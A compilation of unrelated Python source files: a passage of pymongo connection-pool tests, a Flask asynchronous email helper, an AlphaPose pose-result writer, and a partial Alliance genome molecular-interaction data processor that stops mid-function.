start_request=2, end_request=1, nthreads=10, max_pool_size=10)
def test_max_pool_size_with_redundant_request2(self):
self._test_max_pool_size(
start_request=20, end_request=1, nthreads=10, max_pool_size=10)
def test_max_pool_size_with_redundant_request_no_rendezvous(self):
self._test_max_pool_size_no_rendezvous(2, 1)
def test_max_pool_size_with_redundant_request_no_rendezvous2(self):
self._test_max_pool_size_no_rendezvous(20, 1)
def test_max_pool_size_with_leaked_request(self):
# Call start_request() but not end_request() -- when threads die, they
# should return their request sockets to the pool.
self._test_max_pool_size(
start_request=1, end_request=0, nthreads=10, max_pool_size=10)
def test_max_pool_size_with_leaked_request_no_rendezvous(self):
self._test_max_pool_size_no_rendezvous(1, 0)
def test_max_pool_size_with_end_request_only(self):
# Call end_request() but not start_request()
self._test_max_pool_size(0, 1)
def test_max_pool_size_with_connection_failure(self):
# The pool acquires its semaphore before attempting to connect; ensure
# it releases the semaphore on connection failure.
class TestPool(Pool):
def connect(self, pair):
raise socket.error()
test_pool = TestPool(
pair=('example.com', 27017),
max_size=1,
net_timeout=1,
conn_timeout=1,
use_ssl=False,
wait_queue_timeout=1,
use_greenlets=self.use_greenlets)
# First call to get_socket fails; if pool doesn't release its semaphore
# then the second call raises "ConnectionFailure: Timed out waiting for
# socket from pool" instead of the socket.error.
for i in range(2):
self.assertRaises(socket.error, test_pool.get_socket)
class SocketGetter(MongoThread):
"""Utility for _TestMaxOpenSockets and _TestWaitQueueMultiple"""
def __init__(self, test_case, pool):
super(SocketGetter, self).__init__(test_case)
self.state = 'init'
self.pool = pool
self.sock = None
def run(self):
self.state = 'get_socket'
self.sock = self.pool.get_socket()
self.state = 'sock'
class _TestMaxOpenSockets(_TestPoolingBase):
"""Test that connection pool doesn't open more than max_size sockets.
To be run both with threads and with greenlets.
"""
def get_pool_with_wait_queue_timeout(self, wait_queue_timeout):
return self.get_pool((host, port),
1, None, None,
False,
wait_queue_timeout=wait_queue_timeout,
wait_queue_multiple=None)
def test_wait_queue_timeout(self):
wait_queue_timeout = 2 # Seconds
pool = self.get_pool_with_wait_queue_timeout(wait_queue_timeout)
sock_info = pool.get_socket()
start = time.time()
self.assertRaises(ConnectionFailure, pool.get_socket)
duration = time.time() - start
self.assertTrue(
abs(wait_queue_timeout - duration) < 1,
"Waited %.2f seconds for a socket, expected %f" % (
duration, wait_queue_timeout))
sock_info.close()
def test_blocking(self):
# Verify get_socket() with no wait_queue_timeout blocks forever.
pool = self.get_pool_with_wait_queue_timeout(None)
# Reach max_size.
s1 = pool.get_socket()
t = SocketGetter(self, pool)
t.start()
while t.state != 'get_socket':
self.sleep(0.1)
self.sleep(1)
self.assertEqual(t.state, 'get_socket')
pool.maybe_return_socket(s1)
while t.state != 'sock':
self.sleep(0.1)
self.assertEqual(t.state, 'sock')
self.assertEqual(t.sock, s1)
s1.close()
class _TestWaitQueueMultiple(_TestPoolingBase):
"""Test that connection pool doesn't allow more than
waitQueueMultiple * max_size waiters.
To be run both with threads and with greenlets.
"""
def get_pool_with_wait_queue_multiple(self, wait_queue_multiple):
return self.get_pool((host, port),
2, None, None,
False,
wait_queue_timeout=None,
wait_queue_multiple=wait_queue_multiple)
def test_wait_queue_multiple(self):
pool = self.get_pool_with_wait_queue_multiple(3)
# Reach max_size sockets.
socket_info_0 = pool.get_socket()
socket_info_1 = pool.get_socket()
# Reach max_size * wait_queue_multiple waiters.
threads = []
for _ in xrange(6):
t = SocketGetter(self, pool)
t.start()
threads.append(t)
self.sleep(1)
for t in threads:
self.assertEqual(t.state, 'get_socket')
self.assertRaises(ExceededMaxWaiters, pool.get_socket)
socket_info_0.close()
socket_info_1.close()
def test_wait_queue_multiple_unset(self):
pool = self.get_pool_with_wait_queue_multiple(None)
socks = []
for _ in xrange(2):
sock = pool.get_socket()
socks.append(sock)
threads = []
for _ in xrange(30):
t = SocketGetter(self, pool)
t.start()
threads.append(t)
self.sleep(1)
for t in threads:
self.assertEqual(t.state, 'get_socket')
for socket_info in socks:
socket_info.close()
class _TestPoolSocketSharing(_TestPoolingBase):
"""Directly test that two simultaneous operations don't share a socket. To
be run both with threads and with greenlets.
"""
def _test_pool(self, use_request):
"""
Test that the connection pool prevents both threads and greenlets from
using a socket at the same time.
Sequence:
gr0: start a slow find()
gr1: start a fast find()
gr1: get results
gr0: get results
"""
cx = get_client(
use_greenlets=self.use_greenlets,
auto_start_request=False
)
db = cx.pymongo_test
db.test.remove()
db.test.insert({'_id': 1})
history = []
def find_fast():
if use_request:
cx.start_request()
history.append('find_fast start')
# With greenlets and the old connection._Pool, this would throw
# AssertionError: "This event is already used by another
# greenlet"
self.assertEqual({'_id': 1}, db.test.find_one())
history.append('find_fast done')
if use_request:
cx.end_request()
def find_slow():
if use_request:
cx.start_request()
history.append('find_slow start')
# Javascript function that pauses N seconds per document
fn = delay(10)
if (is_mongos(db.connection) or not
version.at_least(db.connection, (1, 7, 2))):
# mongos doesn't support eval so we have to use $where
# which is less reliable in this context.
self.assertEqual(1, db.test.find({"$where": fn}).count())
else:
# 'nolock' allows find_fast to start and finish while we're
# waiting for this to complete.
self.assertEqual({'ok': 1.0, 'retval': True},
db.command('eval', fn, nolock=True))
history.append('find_slow done')
if use_request:
cx.end_request()
if self.use_greenlets:
gr0, gr1 = Greenlet(find_slow), Greenlet(find_fast)
gr0.start()
gr1.start_later(.1)
else:
gr0 = threading.Thread(target=find_slow)
gr0.setDaemon(True)
gr1 = threading.Thread(target=find_fast)
gr1.setDaemon(True)
gr0.start()
time.sleep(.1)
gr1.start()
gr0.join()
gr1.join()
self.assertEqual([
'find_slow start',
'find_fast start',
'find_fast done',
'find_slow done',
], history)
def test_pool(self):
self._test_pool(use_request=False)
def test_pool_request(self):
self._test_pool(use_request=True)
|
email.py
|
"""
For the ability of sending emails in the app.
Must set the config.py first.
"""
from threading import Thread
from flask import current_app, render_template
from flask.ext.mail import Message
from . import mail
# we send asynchronous emails because otherwise we would have the
# browser unresponsive during some time. To avoid this, the email
# send function is moved to the background thread.
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
# Takes the destination address, a subject line, a template and
# make a thread to send this email.
# The template must be given without the extension so that we can
# have both plain and rich text bodies
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['ANTISOCIAL_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['ANTISOCIAL_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
writer.py
|
import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms
DEFAULT_VIDEO_SAVE_OPT = {
'savepath': 'examples/res/1.mp4',
'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
'fps': 25,
'frameSize': (640, 480)
}
class DataWriter():
def __init__(self, cfg, opt, save_video=False,
video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
queueSize=1024):
self.cfg = cfg
self.opt = opt
self.video_save_opt = video_save_opt
self.eval_joints = list(range(cfg.DATA_PRESET.NUM_JOINTS))
self.save_video = save_video
self.final_result = []
self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.result_queue = Queue(maxsize=queueSize)
self.final_result_queue = Queue(maxsize=queueSize)
else:
self.result_queue = mp.Queue(maxsize=queueSize)
self.final_result_queue = mp.Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
if opt.pose_track:
from PoseFlow.poseflow_infer import PoseFlowWrapper
self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to read pose estimation results per frame
self.result_worker = self.start_worker(self.update)
return self
def update(self):
if self.save_video:
# initialize the file video stream, adapt ouput video resolution to original video
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
if not stream.isOpened():
print("Try to use other video encoders...")
ext = self.video_save_opt['savepath'].split('.')[-1]
fourcc, _ext = self.recognize_video_ext(ext)
self.video_save_opt['fourcc'] = fourcc
self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
assert stream.isOpened(), 'Cannot open video for writing'
# keep looping infinitelyd
while True:
# ensure the queue is not empty and get item
(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
if orig_img is None:
# if the thread indicator variable is set (img is None), stop the thread
self.wait_and_put(self.final_result_queue, None)
if self.save_video:
stream.release()
return
# image channel RGB->BGR
orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
if boxes is None:
if self.opt.save_img or self.save_video or self.opt.vis:
self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
pred = hm_data.cpu().data.numpy()
assert pred.ndim == 4
if hm_data.size()[1] == 49:
self.eval_joints = [*range(0,49)]
pose_coords = []
pose_scores = []
for i in range(hm_data.shape[0]):
bbox = cropped_boxes[i].tolist()
pose_coord, pose_score = self.heatmap_to_coord(pred[i][self.eval_joints], bbox)
pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
preds_img = torch.cat(pose_coords)
preds_scores = torch.cat(pose_scores)
result = pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)
result = {
'imgname': im_name,
'result': result
}
if self.opt.pose_track:
poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
for i in range(len(poseflow_result)):
result['result'][i]['idx'] = poseflow_result[i]['idx']
self.wait_and_put(self.final_result_queue, result)
if self.opt.save_img or self.save_video or self.opt.vis:
if hm_data.size()[1] == 49:
from alphapose.utils.vis import vis_frame_dense as vis_frame
elif self.opt.vis_fast:
from alphapose.utils.vis import vis_frame_fast as vis_frame
else:
from alphapose.utils.vis import vis_frame
img = vis_frame(orig_img, result, add_bbox=(self.opt.pose_track | self.opt.tracking))
self.write_image(img, im_name, stream=stream if self.save_video else None)
def write_image(self, img, im_name, stream=None):
if self.opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if self.opt.save_img:
cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name), img)
if self.save_video:
stream.write(img)
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
self.commit()
# save next frame in the queue
self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))
def running(self):
# indicate that the thread is still running
time.sleep(0.2)
self.commit()
return not self.result_queue.empty()
def count(self):
# indicate the remaining images
return self.result_queue.qsize()
def stop(self):
# indicate that the thread should be stopped
self.save(None, None, None, None, None, None, None)
while True:
final_res = self.wait_and_get(self.final_result_queue)
if final_res:
self.final_result.append(final_res)
else:
break
self.result_worker.join()
def clear_queues(self):
self.clear(self.result_queue)
self.clear(self.final_result_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def commit(self):
# commit finished final results to main process
while not self.final_result_queue.empty():
self.final_result.append(self.wait_and_get(self.final_result_queue))
def results(self):
# return final result
return self.final_result
def recognize_video_ext(self, ext=''):
if ext == 'mp4':
return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
elif ext == 'avi':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
elif ext == 'mov':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
else:
print("Unknow video format {}, will use .mp4 instead of it".format(ext))
return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
|
interaction_molecular_processor.py
|
import logging
import multiprocessing
import csv
import re
import json
import os
import sys
import urllib.request
from tqdm import tqdm
from datetime import datetime
from string import Template
from processor import Processor
logger = logging.getLogger(__name__)
class HeaderTemplate(Template):
delimiter = '%'
class InteractionMolecularProcessor(Processor):
def __init__(self, configs):
super().__init__()
self.data_type_configs = configs
self.master_gene_set = set()
self.master_crossreference_dictionary = dict()
self.master_crossreference_dictionary['UniProtKB'] = dict()
self.master_crossreference_dictionary['ENSEMBL'] = dict()
self.master_crossreference_dictionary['NCBI_Gene'] = dict()
self.master_crossreference_dictionary['RefSeq'] = dict()
self.biogrid_rna_set = set()
self.biogrid_genetic_set = set()
self.biogrid_doi_dict = dict()
self.coronavirus_injection_dict = dict()
self.output_dir = '/usr/src/app/output/'
self.download_dir = '/usr/src/app/download_molecular/'
def _load_and_process_data(self):
logger.info("in InteractionMolecularProcessor")
source_filepaths = dict()
interaction_source_config = self.data_type_configs[0]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
source_filepaths[sub_type_name] = sub_type_filepath
for sub_type in source_filepaths:
logger.debug("Source subtype %s filepath %s" % (sub_type, source_filepaths[sub_type]))
bgi_filepaths = dict()
interaction_source_config = self.data_type_configs[1]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
bgi_filepaths[sub_type_name] = sub_type_filepath
for sub_type in bgi_filepaths:
logger.debug("BGI subtype %s filepath %s" % (sub_type, bgi_filepaths[sub_type]))
interactions_molecular = InteractionMolecularProcessor(self.data_type_configs)
interactions_molecular.parse_bgi_json()
interactions_molecular.get_data()
interactions_molecular.validate_and_upload_files_to_fms()
def parse_bgi_json(self):
# We're populating a rather large dictionary to use for looking up Alliance genes by their crossreferences.
# Edit the list below if you'd like to add more crossreferences to the dictionary.
# The key of the dictionary is the crossreference and the value is the Alliance gene to which it resolves.
#
# We're also populating the "master gene set" for gene lookups later.
logger.info('Populating master gene set and crossreferences from JSON.')
bgi_filepaths = dict()
interaction_source_config = self.data_type_configs[1]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
bgi_filepaths[sub_type_name] = sub_type_filepath
for sub_type in bgi_filepaths:
logger.info("BGI subtype %s filepath %s" % (sub_type, bgi_filepaths[sub_type]))
filepath = bgi_filepaths[sub_type]
with open(filepath) as json_file:
data = json.load(json_file)
logger.info('Scanning {}'.format(filepath))
# for local runs, to see progress
# for item in tqdm(data['data']):
for item in data['data']:
gene_identifier = item['basicGeneticEntity']['primaryId']
self.master_gene_set.add(gene_identifier)
for xref in item['basicGeneticEntity']['crossReferences']:
cross_ref_record = None
cross_ref_prefix = None
if xref['id'].startswith('NCBI_Gene'):
# Modify the cross reference ID to match the PSI MITAB format if necessary.
# So far, this is just converting 'NCBI_Gene' to 'entrez gene/locuslink'.
cross_ref_prefix = 'NCBI_Gene'
cross_ref_record_split = xref['id'].split(':')[1]
cross_ref_record = 'entrez gene/locuslink:' + cross_ref_record_split
elif xref['id'].startswith('UniProtKB'):
cross_ref_prefix = 'UniProtKB'
cross_ref_record = xref['id']
elif xref['id'].startswith('ENSEMBL'):
cross_ref_prefix = 'ENSEMBL'
cross_ref_record = xref['id']
elif xref['id'].startswith('RefSeq'):
cross_ref_prefix = 'RefSeq'
cross_ref_record = xref['id']
# The crossreference dictionary is a list of genes linked to a single crossreference.
# Append the gene if the crossref dict entry exists.
# Otherwise, create a list and append the entry.
if cross_ref_record is not None:
if cross_ref_record.lower() in self.master_crossreference_dictionary[cross_ref_prefix]:
self.master_crossreference_dictionary[cross_ref_prefix][cross_ref_record.lower()]\
.append(gene_identifier)
else:
self.master_crossreference_dictionary[cross_ref_prefix][cross_ref_record.lower()] = []
self.master_crossreference_dictionary[cross_ref_prefix][cross_ref_record.lower()].append(
gene_identifier)
# hardcoded exception that does not have a resolvable crossReference identifier in BGI
self.master_crossreference_dictionary['NCBI_Gene']['entrez gene/locuslink:ORF9c'.lower()] = ['RefSeq:P0DTD3']
# The ids in PSI-MITAB files are lower case, hence the .lower() used above.
logger.info('Done.')
def resolve_identifiers_by_row(self, row, mapped_out):
interactor_A_rows = [0, 2, 4, 22]
interactor_B_rows = [1, 3, 5, 23]
interactor_A_resolved = False
interactor_B_resolved = False
taxon1 = re.search(r'taxid:\d+', row[9]).group(0)
taxon2 = re.search(r'taxid:\d+', row[10]).group(0)
interactor_A_list = []
for row_entry in interactor_A_rows:
if '|' in row[row_entry]:
interactors_A = row[row_entry].split('|')
for interactor_A in interactors_A:
interactor_A = interactor_A.replace("uniprot/swiss-prot:", "uniprotkb:")
interactor_A_list.append(interactor_A)
else:
interactor_A_list.append(row[row_entry])
interactor_B_list = []
for row_entry in interactor_B_rows:
if '|' in row[row_entry]:
interactors_B = row[row_entry].split('|')
for interactor_B in interactors_B:
interactor_B = interactor_B.replace("uniprot/swiss-prot:", "uniprotkb:")
interactor_B_list.append(interactor_B)
else:
interactor_B_list.append(row[row_entry])
interactor_A_resolved, A_resolved_id = self.resolve_identifier(interactor_A_list, taxon1)
interactor_B_resolved, B_resolved_id = self.resolve_identifier(interactor_B_list, taxon2)
if A_resolved_id is not None and B_resolved_id is not None:
mapped_output_rows = [row[13], A_resolved_id, B_resolved_id]
mapped_out.writerow(mapped_output_rows)
if taxon1 == 'taxid:2697049': # for sars-cov-2 first match on refseq
if A_resolved_id in self.coronavirus_injection_dict:
row[0] = self.coronavirus_injection_dict[A_resolved_id][0]
row[2] = self.coronavirus_injection_dict[A_resolved_id][1]
row[4] = self.coronavirus_injection_dict[A_resolved_id][2]
if taxon2 == 'taxid:2697049': # for sars-cov-2 first match on refseq
if B_resolved_id in self.coronavirus_injection_dict:
row[1] = self.coronavirus_injection_dict[B_resolved_id][0]
row[3] = self.coronavirus_injection_dict[B_resolved_id][1]
row[5] = self.coronavirus_injection_dict[B_resolved_id][2]
return interactor_A_resolved, interactor_B_resolved, row
def resolve_identifier(self, interactor_list, taxon):
# The order of this list is important.
list_of_crossref_regex_to_search = [
'uniprotkb:[\\w\\d_-]*$',
'ensembl:[\\w\\d_-]*$',
'entrez gene/locuslink:.*$'
]
if taxon == 'taxid:2697049': # for sars-cov-2, first match on refseq
list_of_crossref_regex_to_search.insert(0, 'refseq:[\\w\\d_-]*$')
# Prioritize matching based on regex priority instead of column order
for regex_entry in list_of_crossref_regex_to_search:
for individual_entry in interactor_list:
# For use in wormbase / flybase lookups.
# If we run into an IndexError, there's no identifier to resolve and we return False.
try:
entry_stripped = individual_entry.split(':')[1]
except IndexError:
continue
# uniprotkb: could have trailing '-<something>' that should be stripped
if individual_entry.startswith('uniprotkb:'):
if taxon != 'taxid:2697049': # if not sars-cov-2 strip hyphen and after
individual_entry = individual_entry.split('-')[0]
prefixed_identifier = None
logger.debug('resolving individual_entry : %s ; taxon : %s' % (individual_entry, taxon))
if entry_stripped.startswith('WB'):
prefixed_identifier = 'WB:' + entry_stripped
if prefixed_identifier in self.master_gene_set:
return True, prefixed_identifier
else:
logger.debug('resolved WB False : ' + prefixed_identifier)
return False, None
elif entry_stripped.startswith('FB'):
prefixed_identifier = 'FB:' + entry_stripped
if prefixed_identifier in self.master_gene_set:
logger.debug('resolved FB False : ' + prefixed_identifier)
return True, prefixed_identifier
else:
return False, None
regex_output = re.findall(regex_entry, individual_entry)
if regex_output is not None:
for regex_match in regex_output: # We might have multiple regex matches. Search them all against our crossreferences.
identifier = regex_match
for crossreference_type in self.master_crossreference_dictionary.keys():
# Using lowercase in the identifier to be consistent with Alliance lowercase identifiers.
if identifier.lower() in self.master_crossreference_dictionary[crossreference_type]:
if taxon == 'taxid:2697049': # for sars-cov-2 get the first primaryId value that matches the identifier in the BGI
return True, self.master_crossreference_dictionary[crossreference_type][identifier.lower()][0].lower() # Return 'True' if we find an entry.
else: # for other taxons return the identifier that matches in the BGI
return True, identifier.lower() # Return 'True' if we find an entry.
# If we can't resolve any of the crossReferences, return None
interactor_list_string = "\t".join(interactor_list)
logger.debug('resolved default False : ' + interactor_list_string)
return False, None
def unzip_to_filename(self, filename_zip, filename, datasubtype):
logger.info('Extracting file {} with unzip into {}'.format(filename_zip, filename))
os.system('unzip -o {} -d {}tmp/'.format(filename_zip, self.download_dir))
logger.info('Renaming extracted file.')
if datasubtype == 'IMEX': # Special exception for IMEX because it's 2 files.
os.system('mv {}tmp/intact.txt {}'.format(self.download_dir, filename))
os.system('rm {}tmp/*'.format(self.download_dir))
else:
os.system('mv {}tmp/* {}'.format(self.download_dir, filename))
def read_coronavirus_injection(self, coronavirus_injection_filename):
with open(coronavirus_injection_filename, 'r', encoding='utf-8') as coronavirus_injection_in:
csv_reader = csv.reader(coronavirus_injection_in, delimiter='\t', quoting=csv.QUOTE_NONE)
next(csv_reader, None) # Skip the headers
# for local runs, to see progress
# for row in tqdm(csv_reader):
for row in csv_reader:
if row[0].lower().startswith("refseq"):
logger.debug('Mapping coronavirus_injection_dict %s' % (row[0].lower()))
self.coronavirus_injection_dict[row[0].lower()] = [ row[0], row[1], row[2] ]
def create_biogrid_mappings(self, tab30_filename):
genetic_col12 = (
'Dosage Growth Defect',
'Dosage Lethality',
'Dosage Rescue',
'Negative Genetic',
'Phenotypic Enhancement',
'Phenotypic Suppression',
'Positive Genetic',
'Synthetic Growth Defect',
'Synthetic Haploinsufficiency',
'Synthetic Lethality',
'Synthetic Rescue')
with open(tab30_filename, 'r', encoding='utf-8') as tab30in:
csv_reader = csv.reader(tab30in, delimiter='\t', quoting=csv.QUOTE_NONE)
next(csv_reader, None) # Skip the headers
# for local runs, to see progress
# for row in tqdm(csv_reader):
for row in csv_reader:
if 'RNA' in row[11]:
self.biogrid_rna_set.add(row[0])
if row[12] == 'genetic' and row[11] in genetic_col12:
self.biogrid_genetic_set.add(row[0])
if row[12] == 'Experimental System Type' and row[11] == 'Experimental System':
self.biogrid_genetic_set.add(row[0])
if row[14].lower().startswith("doi"):
biogrid_key = 'biogrid:' + row[0]
self.biogrid_doi_dict[biogrid_key] = row[14].lower()
elif row[14].lower().startswith("pubmed"):
biogrid_key = 'biogrid:' + row[0]
self.biogrid_doi_dict[biogrid_key] = row[14].lower()
def get_data(self):
rejected_col7 = (
# these are genetic interaction values and should not go into molecular output
'biogrid:BIOGRID_SYSTEM:0000010(Synthetic Lethality)',
'biogrid:BIOGRID_SYSTEM:0000011(Synthetic Growth Defect)',
'biogrid:BIOGRID_SYSTEM:0000012(Synthetic Rescue)',
'biogrid:BIOGRID_SYSTEM:0000013(Dosage Lethality)',
'biogrid:BIOGRID_SYSTEM:0000014(Dosage Growth Defect)',
'biogrid:BIOGRID_SYSTEM:0000015(Dosage Rescue)',
'biogrid:BIOGRID_SYSTEM:0000016(Phenotypic Enhancement)',
'biogrid:BIOGRID_SYSTEM:0000017(Phenotypic Suppression)',
'biogrid:BIOGRID_SYSTEM:0000028(Synthetic Haploinsufficiency)',
'biogrid:BIOGRID_SYSTEM:0000029(Negative Genetic)',
'biogrid:BIOGRID_SYSTEM:0000030(Positive Genetic)')
rejected_col12 = (
# these are genetic interaction values and should not go into molecular output
'psi-mi:"MI:2368"("phenotypic enhancement (sensu biogrid)")',
'psi-mi:"MI:2369"("synthetic growth defect (sensu biogrid)")',
'psi-mi:"MI:2370"("synthetic lethality (sensu biogrid)")',
'psi-mi:"MI:2371"("positive genetic interaction (sensu biogrid)")',
'psi-mi:"MI:2372"("synthetic haploinsufficiency (sensu biogrid)")',
'psi-mi:"MI:2373"("negative genetic interaction (sensu biogrid)")',
'psi-mi:"MI:2374"("phenotypic suppression (sensu biogrid)")',
'psi-mi:"MI:2375"("synthetic rescue (sensu biogrid)")',
'psi-mi:"MI:2376"("dosage rescue (sensu biogrid)")',
'psi-mi:"MI:2377"("dosage lethality (sensu biogrid)")',
'psi-mi:"MI:2378"("dosage growth defect (sensu biogrid)")')
source_filepaths = dict()
interaction_source_config = self.data_type_configs[0]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
source_filepaths[sub_type_name] = sub_type_filepath
for sub_type in source_filepaths:
logger.info("Source subtype %s filepath %s" % (sub_type, source_filepaths[sub_type]))
wormbase_filename = source_filepaths['WB-MOL']
flybase_filename = source_filepaths['FB-MOL']
imex_filename_zip = source_filepaths['IMEX']
imex_filename = self.download_dir + 'INTERACTION-SOURCE_IMEX'
biogrid_filename_zip = source_filepaths['BIOGRID']
biogrid_filename = self.download_dir + 'INTERACTION-SOURCE_BIOGRID'
tab30_filename_zip = source_filepaths['BIOGRID-TAB']
tab30_filename = self.download_dir + 'INTERACTION-SOURCE_BIOGRID-TAB'
# comment this out on runs after the first one, to save time on unzipping large files
self.unzip_to_filename(imex_filename_zip, imex_filename, 'IMEX')
self.unzip_to_filename(biogrid_filename_zip, biogrid_filename, 'BIOGRID')
self.unzip_to_filename(tab30_filename_zip, tab30_filename, 'BIOGRID-TAB')
# To use smaller subset files
# imex_filename = self.output_dir + 'IMEx_SARS-CoV-2-human-only_interactions.mitab.txt'
# biogrid_filename = self.output_dir + 'BioGRID_SARS-CoV-2-human-only_interactions.mitab.txt'
self.create_biogrid_mappings(tab30_filename)
coronavirus_injection_filename = 'curation/coronavirus_injection.tsv'
self.read_coronavirus_injection(coronavirus_injection_filename)
# The order of this list is important.
parsing_list = [wormbase_filename, flybase_filename, biogrid_filename, imex_filename]
taxon_species_set = (
'taxid:10116',
'taxid:9606',
'taxid:10090',
'taxid:6239',
'taxid:559292',
'taxid:7955',
'taxid:7227',
'taxid:4932',
'taxid:307796',
'taxid:643680',
'taxid:574961',
'taxid:285006',
'taxid:545124',
'taxid:2697049',
'taxid:764097',
'-')
possible_yeast_taxon_set = ('taxid:4932', 'taxid:307796', 'taxid:643680', 'taxid:574961', 'taxid:285006', 'taxid:545124', 'taxid:764097')
interaction_exclusion_set = ('psi-mi:\"MI:0208\"', 'psi-mi:\"MI:0794\"', 'psi-mi:\"MI:0796\"', 'psi-mi:\"MI:0799\"')
interactor_type_exclusion_set = ('psi-mi:\"MI:0328\"', 'psi-mi:\"MI:1302\"', 'psi-mi:\"MI:1304\"', 'psi-mi:\"MI:0680\"')
# Load genes and uniprot csv files retrieved from the Alliance.
psi_mi_tab_header = [
'#ID(s) interactor A',
'ID(s) interactor B',
'Alt. ID(s) interactor A',
'Alt. ID(s) interactor B',
'Alias(es) interactor A',
'Alias(es) interactor B',
'Interaction detection method(s)',
'Publication 1st author(s)',
'Publication Identifier(s)',
'Taxid interactor A',
'Taxid interactor B',
'Interaction type(s)',
'Source database(s)',
'Interaction identifier(s)',
'Confidence value(s)',
'Expansion method(s)',
'Biological role(s) interactor A',
'Biological role(s) interactor B',
'Experimental role(s) interactor A',
'Experimental role(s) interactor B',
'Type(s) interactor A',
'Type(s) interactor B',
'Xref(s) interactor A',
'Xref(s) interactor B',
'Interaction Xref(s)',
'Annotation(s) interactor A',
'Annotation(s) interactor B',
'Interaction annotation(s)',
'Host organism(s)',
'Interaction parameter(s)',
'Creation date',
'Update date',
'Checksum(s) interactor A',
'Checksum(s) interactor B',
'Interaction Checksum(s)',
'Negative',
'Feature(s) interactor A',
'Feature(s) interactor B',
'Stoichiometry(s) interactor A',
'Stoichiometry(s) interactor B',
'Identification method participant A',
'Identification method participant B'
]
publication_tracking_dict = {}
# Open all of the output files.
with open(self.output_dir + 'alliance_molecular_interactions.tsv', 'w', encoding='utf-8') as tsvout, \
open(self.output_dir + 'alliance_molecular_interactions_sarscov2.tsv', 'w', encoding='utf-8') as sarscov2_out, \
open(self.output_dir + 'alliance_molecular_interactions_fly.tsv', 'w', encoding='utf-8') as fb_out, \
open(self.output_dir + 'alliance_molecular_interactions_worm.tsv', 'w', encoding='utf-8') as wb_out, \
open(self.output_dir + 'alliance_molecular_interactions_zebrafish.tsv', 'w', encoding='utf-8') as zfin_out, \
open(self.output_dir + 'alliance_molecular_interactions_yeast.tsv', 'w', encoding='utf-8') as sgd_out, \
open(self.output_dir + 'alliance_molecular_interactions_rat.tsv', 'w', encoding='utf-8') as rgd_out, \
open(self.output_dir + 'alliance_molecular_interactions_mouse.tsv', 'w', encoding='utf-8') as mgi_out, \
open(self.output_dir + 'alliance_molecular_interactions_human.tsv', 'w', encoding='utf-8') as human_out, \
open(self.output_dir + 'molecular_interactions_skipped_entries.txt', 'w', encoding='utf-8') as skipped_out, \
open(self.output_dir + 'molecular_interactions_mapped_entries.txt', 'a+', encoding='utf-8') as mapped_out:
mapped_out = csv.writer(mapped_out, quotechar = '', quoting=csv.QUOTE_NONE, delimiter='\t')
tsvout = csv.writer(tsvout, quotechar = '', quoting=csv.QUOTE_NONE, delimiter='\t')
skipped_out = csv.writer(skipped_out, quotechar = '', quoting=csv.QUOTE_NONE, delimiter='\t')
sarscov2_out = csv.writer(sarscov2_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
fb_out = csv.writer(fb_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
wb_out = csv.writer(wb_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
zfin_out = csv.writer(zfin_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
sgd_out = csv.writer(sgd_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
rgd_out = csv.writer(rgd_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
